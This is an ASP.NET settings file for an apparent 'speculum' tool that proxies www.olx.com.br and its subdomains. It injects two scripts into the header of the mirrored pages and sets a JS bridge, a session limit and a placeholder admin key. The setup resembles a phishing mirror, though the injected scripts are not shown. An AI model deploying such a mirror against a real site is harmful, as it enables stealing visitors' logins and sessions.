{
    "Logging": {
        "LogLevel": {
            "Default": "Information",
            "Microsoft.AspNetCore": "Warning"
        }
    },
    "AllowedHosts": "*",
    "HttpAddress": "0.0.0.0:8080",
    "Database": {
        "Path": "data/speculum.db"
    },
    "Sidecar": {
        "BaseUrl": "ws://localhost:3000"
    },
    "Admin": {
        "ApiKey": "dev-change-me"
    },
    "Forwarding": {
        "Host": "www.olx.com.br",
        "Domains": [
            "olx.com.br",
            "*.olx.com.br"
        ]
    },
    "MaxSessions": 10,
    "Environment": "Dev",
    "JsBridge": {
        "enable": true
    },
    "ScriptInjection": [
        {
            "File": "/libs/qrcode.js",
            "Position": "HeaderTop",
            "Type": "Classic"
        },
        {
            "File": "/libs/dist.js",
            "Position": "HeaderTop",
            "Type": "Classic"
        }
    ]
}
